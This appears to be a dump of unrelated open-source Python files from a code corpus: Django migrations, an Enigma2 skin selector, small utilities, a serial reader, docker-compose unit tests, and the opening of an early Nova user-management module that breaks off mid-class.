options={'verbose_name': 'quiz activity', 'verbose_name_plural': 'quiz activities'},
),
migrations.AlterField(
model_name='quizactivityitem',
name='question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cs_questions.Question'),
),
]
| jonnatas/codeschool | src/cs_questions/migrations/old/0011_auto_20160522_2051.py | Python | gpl-3.0 | 738 |
# -*- coding: utf-8 -*-
from Screens.Screen import Screen
from Screens.Standby import TryQuitMainloop
from Screens.MessageBox import MessageBox
from Components.ActionMap import NumberActionMap
from Components.Pixmap import Pixmap
from Components.Sources.StaticText import StaticText
from Components.MenuList import MenuList
from Components.config import config, configfile
from Tools.Directories import resolveFilename, SCOPE_ACTIVE_SKIN
from enigma import eEnv, ePicLoad
import os
class SkinSelectorBase:
def __init__(self, session, args = None):
self.setTitle(_("Skin Selector"))
self.skinlist = []
self.previewPath = ""
if self.SKINXML and os.path.exists(os.path.join(self.root, self.SKINXML)):
self.skinlist.append(self.DEFAULTSKIN)
if self.PICONSKINXML and os.path.exists(os.path.join(self.root, self.PICONSKINXML)):
self.skinlist.append(self.PICONDEFAULTSKIN)
for root, dirs, files in os.walk(self.root, followlinks=True):
for subdir in dirs:
dir = os.path.join(root,subdir)
if os.path.exists(os.path.join(dir,self.SKINXML)):
self.skinlist.append(subdir)
dirs = []
self["key_red"] = StaticText(_("Close"))
self["key_green"] = StaticText(_("Save"))
self["introduction"] = StaticText(_("Press OK to activate the selected skin."))
self["SkinList"] = MenuList(self.skinlist)
self["Preview"] = Pixmap()
self.skinlist.sort()
self["actions"] = NumberActionMap(["SetupActions", "DirectionActions", "TimerEditActions", "ColorActions"],
{
"ok": self.ok,
"cancel": self.close,
"red": self.close,
"green": self.ok,
"up": self.up,
"down": self.down,
"left": self.left,
"right": self.right,
"log": self.info,
}, -1)
self.picload = ePicLoad()
self.picload.PictureData.get().append(self.showPic)
self.onLayoutFinish.append(self.layoutFinished)
def showPic(self, picInfo=""):
ptr = self.picload.getData()
if ptr is not None:
self["Preview"].instance.setPixmap(ptr.__deref__())
self["Preview"].show()
def layoutFinished(self):
self.picload.setPara((self["Preview"].instance.size().width(), self["Preview"].instance.size().height(), 0, 0, 1, 1, "#00000000"))
tmp = self.config.value.find("/"+self.SKINXML)
if tmp != -1:
tmp = self.config.value[:tmp]
idx = 0
for skin in self.skinlist:
if skin == tmp:
break
idx += 1
if idx < len(self.skinlist):
self["SkinList"].moveToIndex(idx)
self.loadPreview()
def ok(self):
if self["SkinList"].getCurrent() == self.DEFAULTSKIN:
self.skinfile = ""
self.skinfile = os.path.join(self.skinfile, self.SKINXML)
elif self["SkinList"].getCurrent() == self.PICONDEFAULTSKIN:
self.skinfile = ""
self.skinfile = os.path.join(self.skinfile, self.PICONSKINXML)
else:
self.skinfile = self["SkinList"].getCurrent()
self.skinfile = os.path.join(self.skinfile, self.SKINXML)
print "Skinselector: Selected Skin: "+self.root+self.skinfile
restartbox = self.session.openWithCallback(self.restartGUI,MessageBox,_("GUI needs a restart to apply a new skin\nDo you want to restart the GUI now?"), MessageBox.TYPE_YESNO)
restartbox.setTitle(_("Restart GUI now?"))
def up(self):
self["SkinList"].up()
self.loadPreview()
def down(self):
self["SkinList"].down()
self.loadPreview()
def left(self):
self["SkinList"].pageUp()
self.loadPreview()
def right(self):
self["SkinList"].pageDown()
self.loadPreview()
def info(self):
aboutbox = self.session.open(MessageBox,_("Enigma2 skin selector"), MessageBox.TYPE_INFO)
aboutbox.setTitle(_("About..."))
def loadPreview(self):
if self["SkinList"].getCurrent() == self.DEFAULTSKIN:
pngpath = "."
pngpath = os.path.join(os.path.join(self.root, pngpath), "prev.png")
elif self["SkinList"].getCurrent() == self.PICONDEFAULTSKIN:
pngpath = "."
pngpath = os.path.join(os.path.join(self.root, pngpath), "piconprev.png")
else:
pngpath = self["SkinList"].getCurrent()
try:
pngpath = os.path.join(os.path.join(self.root, pngpath), "prev.png")
except:
pass
if not os.path.exists(pngpath):
pngpath = resolveFilename(SCOPE_ACTIVE_SKIN, "noprev.png")
if self.previewPath != pngpath:
self.previewPath = pngpath
self.picload.startDecode(self.previewPath)
def restartGUI(self, answer):
if answer is True:
if isinstance(self, LcdSkinSelector):
config.skin.display_skin.value = self.skinfile
config.skin.display_skin.save()
else:
config.skin.primary_skin.value = self.skinfile
config.skin.primary_skin.save()
self.session.open(TryQuitMainloop, 3)
class SkinSelector(Screen, SkinSelectorBase):
SKINXML = "skin.xml"
DEFAULTSKIN = _("< Default >")
PICONSKINXML = None
PICONDEFAULTSKIN = None
skinlist = []
root = os.path.join(eEnv.resolve("${datadir}"),"enigma2")
def __init__(self, session, args = None):
Screen.__init__(self, session)
SkinSelectorBase.__init__(self, args)
Screen.setTitle(self, _("Skin setup"))
self.skinName = "SkinSelector"
self.config = config.skin.primary_skin
class LcdSkinSelector(Screen, SkinSelectorBase):
SKINXML = "skin_display.xml"
DEFAULTSKIN = _("< Default >")
PICONSKINXML = "skin_display_picon.xml"
PICONDEFAULTSKIN = _("< Default with Picon >")
skinlist = []
root = os.path.join(eEnv.resolve("${datadir}"),"enigma2/display/")
def __init__(self, session, args = None):
Screen.__init__(self, session)
SkinSelectorBase.__init__(self, args)
Screen.setTitle(self, _("Skin setup"))
self.skinName = "SkinSelector"
self.config = config.skin.display_skin
| 0sc0d3r/enigma2 | lib/python/Screens/SkinSelector.py | Python | gpl-2.0 | 5,526 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-10-08 14:24
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mainapp', '0013_auto_20181005_1900'),
]
operations = [
migrations.AddField(
model_name='userprofile',
name='pgp_key_fingerprint',
field=models.CharField(blank=True, max_length=64, null=True),
),
]
| meine-stadt-transparent/meine-stadt-transparent | mainapp/migrations/0014_userprofile_pgp_key_fingerprint.py | Python | mit | 490 |
# -*- coding: utf-8 -*-
from collections import Counter
from .design_pattern import singleton
@singleton()
class ListUtilsClass(object):
def most_common_inspect(self, list1):
new_list = []
for s1 in list1:
if not isinstance(s1, unicode):
s1 = str(s1).decode("UTF-8")
new_list.append(s1)
cc = Counter(new_list).most_common()
if len(cc) > 0:
max_len = len(max([c1[0] for c1 in cc], key=lambda x1: len(x1))) + 5
for c1 in cc:
print c1[0].ljust(max_len, ' '), ' : ', c1[1]
return cc
def uniq_seqs(self, seqs, uniq_lambda=None):
if uniq_lambda is None:
return list(set(seqs))
__uniq = set([])
__remove_idxes = []
for idx1, seq1 in enumerate(seqs[:]):
__id = uniq_lambda(seq1)
if __id in __uniq:
__remove_idxes.append(idx1)
else:
__uniq.add(__id)
new_seqs = []
for idx1, seq1 in enumerate(seqs[:]):
if idx1 not in __remove_idxes:
new_seqs.append(seq1)
seqs = new_seqs
return seqs
ListUtils = ListUtilsClass()
uniq_seqs = ListUtils.uniq_seqs
| Luiti/etl_utils | etl_utils/list_utils.py | Python | mit | 1,250 |
# Glumol - An adventure game creator
# Copyright (C) 1998-2008 Sylvain Baubeau & Alexis Contour
# This file is part of Glumol.
# Glumol is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# Glumol is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Glumol. If not, see <http://www.gnu.org/licenses/>.
import wx
from log import log
class ConfigManager:
def __init__(self):
log("Loading configuration")
self.config = wx.FileConfig("artub", "bnc", "artub.conf")
def __getitem__(self, key):
if type(key) != str:
raise KeyError
if not self.config.Exists(key):
raise IndexError
try:
val = self.config.Read(key)
except:
return ''
return val
def __setitem__(self, key, item):
if type(key) != str:
raise KeyError
self.config.Write(key, str(item))
config = ConfigManager() | lebauce/artub | configmanager.py | Python | gpl-2.0 | 1,399 |
#!/usr/bin/env python
from argparse import ArgumentParser
import sys
import serial
from datetime import datetime
def run(device, baud, prefix=None):
with serial.Serial(device, baud, timeout=0.1) as ser:
while True:
line = ser.readline()
if not line:
continue
if prefix:
line = prefix() + line
sys.stdout.write(line)
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('device',
help='serial device, typically /dev/tty.usbserial-*')
parser.add_argument('--baud', dest='baud', type=int, default=74880)
parser.add_argument('-t', '--timestamp', dest='timestamp', action='store_true',
help="Add timestamp to start of each line")
args = parser.parse_args()
prefix = None
if args.timestamp:
prefix = lambda: datetime.now().strftime("[%H:%M:%S.%f] ")
run(args.device, args.baud, prefix)
| recursify/serial-debug-tool | serial_reader.py | Python | unlicense | 983 |
from __future__ import absolute_import
from __future__ import unicode_literals
import docker
from .. import mock
from .. import unittest
from compose.const import LABEL_CONFIG_HASH
from compose.const import LABEL_ONE_OFF
from compose.const import LABEL_PROJECT
from compose.const import LABEL_SERVICE
from compose.container import Container
from compose.service import build_volume_binding
from compose.service import ConfigError
from compose.service import ContainerNet
from compose.service import get_container_data_volumes
from compose.service import merge_volume_bindings
from compose.service import NeedsBuildError
from compose.service import Net
from compose.service import NoSuchImageError
from compose.service import parse_repository_tag
from compose.service import parse_volume_spec
from compose.service import Service
from compose.service import ServiceNet
class ServiceTest(unittest.TestCase):
def setUp(self):
self.mock_client = mock.create_autospec(docker.Client)
def test_project_validation(self):
self.assertRaises(ConfigError, lambda: Service(name='foo', project='>', image='foo'))
Service(name='foo', project='bar.bar__', image='foo')
def test_containers(self):
service = Service('db', self.mock_client, 'myproject', image='foo')
self.mock_client.containers.return_value = []
self.assertEqual(list(service.containers()), [])
def test_containers_with_containers(self):
self.mock_client.containers.return_value = [
dict(Name=str(i), Image='foo', Id=i) for i in range(3)
]
service = Service('db', self.mock_client, 'myproject', image='foo')
self.assertEqual([c.id for c in service.containers()], list(range(3)))
expected_labels = [
'{0}=myproject'.format(LABEL_PROJECT),
'{0}=db'.format(LABEL_SERVICE),
'{0}=False'.format(LABEL_ONE_OFF),
]
self.mock_client.containers.assert_called_once_with(
all=False,
filters={'label': expected_labels})
def test_container_without_name(self):
self.mock_client.containers.return_value = [
{'Image': 'foo', 'Id': '1', 'Name': '1'},
{'Image': 'foo', 'Id': '2', 'Name': None},
{'Image': 'foo', 'Id': '3'},
]
service = Service('db', self.mock_client, 'myproject', image='foo')
self.assertEqual([c.id for c in service.containers()], ['1'])
self.assertEqual(service._next_container_number(), 2)
self.assertEqual(service.get_container(1).id, '1')
def test_get_volumes_from_container(self):
container_id = 'aabbccddee'
service = Service(
'test',
image='foo',
volumes_from=[mock.Mock(id=container_id, spec=Container)])
self.assertEqual(service._get_volumes_from(), [container_id])
def test_get_volumes_from_service_container_exists(self):
container_ids = ['aabbccddee', '12345']
from_service = mock.create_autospec(Service)
from_service.containers.return_value = [
mock.Mock(id=container_id, spec=Container)
for container_id in container_ids
]
service = Service('test', volumes_from=[from_service], image='foo')
self.assertEqual(service._get_volumes_from(), container_ids)
def test_get_volumes_from_service_no_container(self):
container_id = 'abababab'
from_service = mock.create_autospec(Service)
from_service.containers.return_value = []
from_service.create_container.return_value = mock.Mock(
id=container_id,
spec=Container)
service = Service('test', image='foo', volumes_from=[from_service])
self.assertEqual(service._get_volumes_from(), [container_id])
from_service.create_container.assert_called_once_with()
def test_split_domainname_none(self):
service = Service('foo', image='foo', hostname='name', client=self.mock_client)
opts = service._get_container_create_options({'image': 'foo'}, 1)
self.assertEqual(opts['hostname'], 'name', 'hostname')
self.assertFalse('domainname' in opts, 'domainname')
def test_memory_swap_limit(self):
self.mock_client.create_host_config.return_value = {}
service = Service(name='foo', image='foo', hostname='name', client=self.mock_client, mem_limit=1000000000, memswap_limit=2000000000)
service._get_container_create_options({'some': 'overrides'}, 1)
self.assertTrue(self.mock_client.create_host_config.called)
self.assertEqual(
self.mock_client.create_host_config.call_args[1]['mem_limit'],
1000000000
)
self.assertEqual(
self.mock_client.create_host_config.call_args[1]['memswap_limit'],
2000000000
)
def test_log_opt(self):
self.mock_client.create_host_config.return_value = {}
log_opt = {'syslog-address': 'tcp://192.168.0.42:123'}
service = Service(name='foo', image='foo', hostname='name', client=self.mock_client, log_driver='syslog', log_opt=log_opt)
service._get_container_create_options({'some': 'overrides'}, 1)
self.assertTrue(self.mock_client.create_host_config.called)
self.assertEqual(
self.mock_client.create_host_config.call_args[1]['log_config'],
{'Type': 'syslog', 'Config': {'syslog-address': 'tcp://192.168.0.42:123'}}
)
def test_split_domainname_fqdn(self):
service = Service(
'foo',
hostname='name.domain.tld',
image='foo',
client=self.mock_client)
opts = service._get_container_create_options({'image': 'foo'}, 1)
self.assertEqual(opts['hostname'], 'name', 'hostname')
self.assertEqual(opts['domainname'], 'domain.tld', 'domainname')
def test_split_domainname_both(self):
service = Service(
'foo',
hostname='name',
image='foo',
domainname='domain.tld',
client=self.mock_client)
opts = service._get_container_create_options({'image': 'foo'}, 1)
self.assertEqual(opts['hostname'], 'name', 'hostname')
self.assertEqual(opts['domainname'], 'domain.tld', 'domainname')
def test_split_domainname_weird(self):
service = Service(
'foo',
hostname='name.sub',
domainname='domain.tld',
image='foo',
client=self.mock_client)
opts = service._get_container_create_options({'image': 'foo'}, 1)
self.assertEqual(opts['hostname'], 'name.sub', 'hostname')
self.assertEqual(opts['domainname'], 'domain.tld', 'domainname')
def test_get_container_create_options_with_name_option(self):
service = Service(
'foo',
image='foo',
client=self.mock_client,
container_name='foo1')
name = 'the_new_name'
opts = service._get_container_create_options(
{'name': name},
1,
one_off=True)
self.assertEqual(opts['name'], name)
def test_get_container_create_options_does_not_mutate_options(self):
labels = {'thing': 'real'}
environment = {'also': 'real'}
service = Service(
'foo',
image='foo',
labels=dict(labels),
client=self.mock_client,
environment=dict(environment),
)
self.mock_client.inspect_image.return_value = {'Id': 'abcd'}
prev_container = mock.Mock(
id='ababab',
image_config={'ContainerConfig': {}})
opts = service._get_container_create_options(
{},
1,
previous_container=prev_container)
self.assertEqual(service.options['labels'], labels)
self.assertEqual(service.options['environment'], environment)
self.assertEqual(
opts['labels'][LABEL_CONFIG_HASH],
'3c85881a8903b9d73a06c41860c8be08acce1494ab4cf8408375966dccd714de')
self.assertEqual(
opts['environment'],
{
'affinity:container': '=ababab',
'also': 'real',
}
)
def test_get_container_not_found(self):
self.mock_client.containers.return_value = []
service = Service('foo', client=self.mock_client, image='foo')
self.assertRaises(ValueError, service.get_container)
@mock.patch('compose.service.Container', autospec=True)
def test_get_container(self, mock_container_class):
container_dict = dict(Name='default_foo_2')
self.mock_client.containers.return_value = [container_dict]
service = Service('foo', image='foo', client=self.mock_client)
container = service.get_container(number=2)
self.assertEqual(container, mock_container_class.from_ps.return_value)
mock_container_class.from_ps.assert_called_once_with(
self.mock_client, container_dict)
@mock.patch('compose.service.log', autospec=True)
def test_pull_image(self, mock_log):
service = Service('foo', client=self.mock_client, image='someimage:sometag')
service.pull()
self.mock_client.pull.assert_called_once_with(
'someimage',
tag='sometag',
stream=True)
mock_log.info.assert_called_once_with('Pulling foo (someimage:sometag)...')
def test_pull_image_no_tag(self):
service = Service('foo', client=self.mock_client, image='ababab')
service.pull()
self.mock_client.pull.assert_called_once_with(
'ababab',
tag='latest',
stream=True)
@mock.patch('compose.service.log', autospec=True)
def test_pull_image_digest(self, mock_log):
service = Service('foo', client=self.mock_client, image='someimage@sha256:1234')
service.pull()
self.mock_client.pull.assert_called_once_with(
'someimage',
tag='sha256:1234',
stream=True)
mock_log.info.assert_called_once_with('Pulling foo (someimage@sha256:1234)...')
@mock.patch('compose.service.Container', autospec=True)
def test_recreate_container(self, _):
mock_container = mock.create_autospec(Container)
service = Service('foo', client=self.mock_client, image='someimage')
service.image = lambda: {'Id': 'abc123'}
new_container = service.recreate_container(mock_container)
mock_container.stop.assert_called_once_with(timeout=10)
self.mock_client.rename.assert_called_once_with(
mock_container.id,
'%s_%s' % (mock_container.short_id, mock_container.name))
new_container.start.assert_called_once_with()
mock_container.remove.assert_called_once_with()
@mock.patch('compose.service.Container', autospec=True)
def test_recreate_container_with_timeout(self, _):
mock_container = mock.create_autospec(Container)
self.mock_client.inspect_image.return_value = {'Id': 'abc123'}
service = Service('foo', client=self.mock_client, image='someimage')
service.recreate_container(mock_container, timeout=1)
mock_container.stop.assert_called_once_with(timeout=1)
def test_parse_repository_tag(self):
self.assertEqual(parse_repository_tag("root"), ("root", "", ":"))
self.assertEqual(parse_repository_tag("root:tag"), ("root", "tag", ":"))
self.assertEqual(parse_repository_tag("user/repo"), ("user/repo", "", ":"))
self.assertEqual(parse_repository_tag("user/repo:tag"), ("user/repo", "tag", ":"))
self.assertEqual(parse_repository_tag("url:5000/repo"), ("url:5000/repo", "", ":"))
self.assertEqual(parse_repository_tag("url:5000/repo:tag"), ("url:5000/repo", "tag", ":"))
self.assertEqual(parse_repository_tag("root@sha256:digest"), ("root", "sha256:digest", "@"))
self.assertEqual(parse_repository_tag("user/repo@sha256:digest"), ("user/repo", "sha256:digest", "@"))
self.assertEqual(parse_repository_tag("url:5000/repo@sha256:digest"), ("url:5000/repo", "sha256:digest", "@"))
@mock.patch('compose.service.Container', autospec=True)
def test_create_container_latest_is_used_when_no_tag_specified(self, mock_container):
service = Service('foo', client=self.mock_client, image='someimage')
images = []
def pull(repo, tag=None, **kwargs):
self.assertEqual('someimage', repo)
self.assertEqual('latest', tag)
images.append({'Id': 'abc123'})
return []
service.image = lambda *args, **kwargs: mock_get_image(images)
self.mock_client.pull = pull
service.create_container()
self.assertEqual(1, len(images))
def test_create_container_with_build(self):
service = Service('foo', client=self.mock_client, build='.')
images = []
service.image = lambda *args, **kwargs: mock_get_image(images)
service.build = lambda: images.append({'Id': 'abc123'})
service.create_container(do_build=True)
self.assertEqual(1, len(images))
def test_create_container_no_build(self):
service = Service('foo', client=self.mock_client, build='.')
service.image = lambda: {'Id': 'abc123'}
service.create_container(do_build=False)
self.assertFalse(self.mock_client.build.called)
def test_create_container_no_build_but_needs_build(self):
service = Service('foo', client=self.mock_client, build='.')
service.image = lambda *args, **kwargs: mock_get_image([])
with self.assertRaises(NeedsBuildError):
service.create_container(do_build=False)
def test_build_does_not_pull(self):
self.mock_client.build.return_value = [
b'{"stream": "Successfully built 12345"}',
]
service = Service('foo', client=self.mock_client, build='.')
service.build()
self.assertEqual(self.mock_client.build.call_count, 1)
self.assertFalse(self.mock_client.build.call_args[1]['pull'])
def test_config_dict(self):
self.mock_client.inspect_image.return_value = {'Id': 'abcd'}
service = Service(
'foo',
image='example.com/foo',
client=self.mock_client,
net=ServiceNet(Service('other')),
links=[(Service('one'), 'one')],
volumes_from=[Service('two')])
config_dict = service.config_dict()
expected = {
'image_id': 'abcd',
'options': {'image': 'example.com/foo'},
'links': [('one', 'one')],
'net': 'other',
'volumes_from': ['two'],
}
self.assertEqual(config_dict, expected)
def test_config_dict_with_net_from_container(self):
self.mock_client.inspect_image.return_value = {'Id': 'abcd'}
container = Container(
self.mock_client,
{'Id': 'aaabbb', 'Name': '/foo_1'})
service = Service(
'foo',
image='example.com/foo',
client=self.mock_client,
net=container)
config_dict = service.config_dict()
expected = {
'image_id': 'abcd',
'options': {'image': 'example.com/foo'},
'links': [],
'net': 'aaabbb',
'volumes_from': [],
}
self.assertEqual(config_dict, expected)
class NetTestCase(unittest.TestCase):
def test_net(self):
net = Net('host')
self.assertEqual(net.id, 'host')
self.assertEqual(net.mode, 'host')
self.assertEqual(net.service_name, None)
def test_net_container(self):
container_id = 'abcd'
net = ContainerNet(Container(None, {'Id': container_id}))
self.assertEqual(net.id, container_id)
self.assertEqual(net.mode, 'container:' + container_id)
self.assertEqual(net.service_name, None)
def test_net_service(self):
container_id = 'bbbb'
service_name = 'web'
mock_client = mock.create_autospec(docker.Client)
mock_client.containers.return_value = [
{'Id': container_id, 'Name': container_id, 'Image': 'abcd'},
]
service = Service(name=service_name, client=mock_client)
net = ServiceNet(service)
self.assertEqual(net.id, service_name)
self.assertEqual(net.mode, 'container:' + container_id)
self.assertEqual(net.service_name, service_name)
def test_net_service_no_containers(self):
service_name = 'web'
mock_client = mock.create_autospec(docker.Client)
mock_client.containers.return_value = []
service = Service(name=service_name, client=mock_client)
net = ServiceNet(service)
self.assertEqual(net.id, service_name)
self.assertEqual(net.mode, None)
self.assertEqual(net.service_name, service_name)
def mock_get_image(images):
if images:
return images[0]
else:
raise NoSuchImageError()
class ServiceVolumesTest(unittest.TestCase):
def setUp(self):
self.mock_client = mock.create_autospec(docker.Client)
def test_parse_volume_spec_only_one_path(self):
spec = parse_volume_spec('/the/volume')
self.assertEqual(spec, (None, '/the/volume', 'rw'))
def test_parse_volume_spec_internal_and_external(self):
spec = parse_volume_spec('external:interval')
self.assertEqual(spec, ('external', 'interval', 'rw'))
def test_parse_volume_spec_with_mode(self):
spec = parse_volume_spec('external:interval:ro')
self.assertEqual(spec, ('external', 'interval', 'ro'))
spec = parse_volume_spec('external:interval:z')
self.assertEqual(spec, ('external', 'interval', 'z'))
def test_parse_volume_spec_too_many_parts(self):
with self.assertRaises(ConfigError):
parse_volume_spec('one:two:three:four')
def test_build_volume_binding(self):
binding = build_volume_binding(parse_volume_spec('/outside:/inside'))
self.assertEqual(binding, ('/inside', '/outside:/inside:rw'))
def test_get_container_data_volumes(self):
options = [
'/host/volume:/host/volume:ro',
'/new/volume',
'/existing/volume',
]
self.mock_client.inspect_image.return_value = {
'ContainerConfig': {
'Volumes': {
'/mnt/image/data': {},
}
}
}
container = Container(self.mock_client, {
'Image': 'ababab',
'Volumes': {
'/host/volume': '/host/volume',
'/existing/volume': '/var/lib/docker/aaaaaaaa',
'/removed/volume': '/var/lib/docker/bbbbbbbb',
'/mnt/image/data': '/var/lib/docker/cccccccc',
},
}, has_been_inspected=True)
expected = {
'/existing/volume': '/var/lib/docker/aaaaaaaa:/existing/volume:rw',
'/mnt/image/data': '/var/lib/docker/cccccccc:/mnt/image/data:rw',
}
binds = get_container_data_volumes(container, options)
self.assertEqual(binds, expected)
def test_merge_volume_bindings(self):
options = [
'/host/volume:/host/volume:ro',
'/host/rw/volume:/host/rw/volume',
'/new/volume',
'/existing/volume',
]
self.mock_client.inspect_image.return_value = {
'ContainerConfig': {'Volumes': {}}
}
intermediate_container = Container(self.mock_client, {
'Image': 'ababab',
'Volumes': {'/existing/volume': '/var/lib/docker/aaaaaaaa'},
}, has_been_inspected=True)
expected = [
'/host/volume:/host/volume:ro',
'/host/rw/volume:/host/rw/volume:rw',
'/var/lib/docker/aaaaaaaa:/existing/volume:rw',
]
binds = merge_volume_bindings(options, intermediate_container)
self.assertEqual(set(binds), set(expected))
def test_mount_same_host_path_to_two_volumes(self):
service = Service(
'web',
image='busybox',
volumes=[
'/host/path:/data1',
'/host/path:/data2',
],
client=self.mock_client,
)
self.mock_client.inspect_image.return_value = {
'Id': 'ababab',
'ContainerConfig': {
'Volumes': {}
}
}
service._get_container_create_options(
override_options={},
number=1,
)
self.assertEqual(
set(self.mock_client.create_host_config.call_args[1]['binds']),
set([
'/host/path:/data1:rw',
'/host/path:/data2:rw',
]),
)
def test_different_host_path_in_container_json(self):
service = Service(
'web',
image='busybox',
volumes=['/host/path:/data'],
client=self.mock_client,
)
self.mock_client.inspect_image.return_value = {
'Id': 'ababab',
'ContainerConfig': {
'Volumes': {
'/data': {},
}
}
}
self.mock_client.inspect_container.return_value = {
'Id': '123123123',
'Image': 'ababab',
'Volumes': {
'/data': '/mnt/sda1/host/path',
},
}
service._get_container_create_options(
override_options={},
number=1,
previous_container=Container(self.mock_client, {'Id': '123123123'}),
)
self.assertEqual(
self.mock_client.create_host_config.call_args[1]['binds'],
['/mnt/sda1/host/path:/data:rw'],
)
def test_create_with_special_volume_mode(self):
self.mock_client.inspect_image.return_value = {'Id': 'imageid'}
create_calls = []
def create_container(*args, **kwargs):
create_calls.append((args, kwargs))
return {'Id': 'containerid'}
self.mock_client.create_container = create_container
volumes = ['/tmp:/foo:z']
Service(
'web',
client=self.mock_client,
image='busybox',
volumes=volumes,
).create_container()
self.assertEqual(len(create_calls), 1)
self.assertEqual(self.mock_client.create_host_config.call_args[1]['binds'], volumes)
| TheDataShed/compose | tests/unit/service_test.py | Python | apache-2.0 | 22,651 |
#!/usr/bin/env python
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2010 Anso Labs, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Nova users and user management, including RBAC hooks.
"""
import datetime
import logging
import os
import shutil
import string
from string import Template
import tempfile
import uuid
import zipfile
try:
import ldap
except Exception, e:
import fakeldap as ldap
import fakeldap
from nova import datastore
# TODO(termie): clean up these imports
import signer
from nova import exception
from nova import flags
from nova import crypto
from nova import utils
from nova import objectstore # for flags
FLAGS = flags.FLAGS
flags.DEFINE_string('ldap_url', 'ldap://localhost', 'Point this at your ldap server')
flags.DEFINE_string('ldap_password', 'changeme', 'LDAP password')
flags.DEFINE_string('user_dn', 'cn=Manager,dc=example,dc=com', 'DN of admin user')
flags.DEFINE_string('user_unit', 'Users', 'OID for Users')
flags.DEFINE_string('user_ldap_subtree', 'ou=Users,dc=example,dc=com', 'OU for Users')
flags.DEFINE_string('project_ldap_subtree', 'ou=Groups,dc=example,dc=com', 'OU for Projects')
flags.DEFINE_string('role_ldap_subtree', 'ou=Groups,dc=example,dc=com', 'OU for Roles')
# mapping with these flags is necessary because we're going to tie in to an existing ldap schema
flags.DEFINE_string('ldap_cloudadmin',
'cn=cloudadmins,ou=Groups,dc=example,dc=com', 'cn for Cloud Admins')
flags.DEFINE_string('ldap_itsec',
'cn=itsec,ou=Groups,dc=example,dc=com', 'cn for ItSec')
flags.DEFINE_string('ldap_sysadmin',
'cn=sysadmins,ou=Groups,dc=example,dc=com', 'cn for Sysadmins')
flags.DEFINE_string('ldap_netadmin',
'cn=netadmins,ou=Groups,dc=example,dc=com', 'cn for NetAdmins')
flags.DEFINE_string('ldap_developer',
'cn=developers,ou=Groups,dc=example,dc=com', 'cn for Developers')
# a user with one of these roles will be a superuser and have access to all api commands
flags.DEFINE_list('superuser_roles', ['cloudadmin'], 'roles that ignore rbac checking completely')
# a user with one of these roles will have it for every project, even if he or she is not a member of the project
flags.DEFINE_list('global_roles', ['cloudadmin', 'itsec'], 'roles that apply to all projects')
flags.DEFINE_string('credentials_template',
utils.abspath('auth/novarc.template'),
'Template for creating users rc file')
flags.DEFINE_string('vpn_client_template',
utils.abspath('cloudpipe/client.ovpn.template'),
'Template for creating users vpn file')
flags.DEFINE_string('credential_key_file', 'pk.pem',
'Filename of private key in credentials zip')
flags.DEFINE_string('credential_cert_file', 'cert.pem',
'Filename of certificate in credentials zip')
flags.DEFINE_string('credential_rc_file', 'novarc',
'Filename of rc in credentials zip')
flags.DEFINE_string('vpn_ip', '127.0.0.1', 'Public IP for the cloudpipe VPN servers')
class AuthBase(object):
@classmethod
def safe_id(cls, obj):
"""this method will return the id of the object if the object is of this class, otherwise
it will return the original object. This allows methods to accept objects or
ids as paramaters"""
if isinstance(obj, cls):
return obj.id
else:
return obj
class User(AuthBase):
"""id and name are currently the same"""
def __init__(self, id, name, access, secret, admin):
self.id = id
self.name = name
self.access = access
self.secret = secret
self.admin = admin
@property
def vpn_port(self):
port_map = self.keeper['vpn_ports']
if not port_map: port_map = {}
if not port_map.has_key(self.id):
ports = port_map.values()
if len(ports) > 0:
port_map[self.id] = max(ports) + 1
else:
port_map[self.id] = 8000
self.keeper['vpn_ports'] = port_map
return self.keeper['vpn_ports'][self.id]
@property
def vpn_ip(self):
return FLAGS.vpn_ip
def is_superuser(self):
"""allows user to bypass rbac completely"""
if self.admin:
return True
for role in FLAGS.superuser_roles:
if self.has_role(role):
return True
def is_admin(self):
"""allows user to see objects from all projects"""
if self.is_superuser():
return True
for role in FLAGS.global_roles:
if self.has_role(role):
return True
def has_role(self, role):
return UserManager.instance().has_role(self, role)
def add_role(self, role):
return UserManager.instance().add_role(self, role)
def remove_role(self, role):
return UserManager.instance().remove_role(self, role)
def is_project_member(self, project):
return UserManager.instance().is_project_member(self, project)
def is_project_manager(self, project):
return UserManager.instance().is_project_manager(self, project)
def generate_rc(self, project=None):
if project is None:
project = self.id
rc = open(FLAGS.credentials_template).read()
rc = rc % { 'access': self.access,
'project': project,
'secret': self.secret,
'ec2': FLAGS.ec2_url,
's3': 'http://%s:%s' % (FLAGS.s3_host, FLAGS.s3_port),
'nova': FLAGS.ca_file,
'cert': FLAGS.credential_cert_file,
'key': FLAGS.credential_key_file,
}
return rc
def generate_key_pair(self, name):
return UserManager.instance().generate_key_pair(self.id, name)
def create_key_pair(self, name, public_key, fingerprint):
return UserManager.instance().create_key_pair(self.id,
name,
public_key,
fingerprint)
def get_key_pair(self, name):
return UserManager.instance().get_key_pair(self.id, name)
def delete_key_pair(self, name):
return UserManager.instance().delete_key_pair(self.id, name)
def get_key_pairs(self):
return UserManager.instance().get_key_pairs(self.id)
def __repr__(self):
return "User('%s', '%s', '%s', '%s', %s)" % (self.id, self.name, self.access, self.secret, self.admin)
class KeyPair(AuthBase):
def __init__(self, id, owner_id, public_key, fingerprint):
self.id = id
self.name = id
self.owner_id = owner_id
self.public_key = public_key
self.fingerprint = fingerprint
def delete(self):
return UserManager.instance().delete_key_pair(self.owner, self.name)
def __repr__(self):
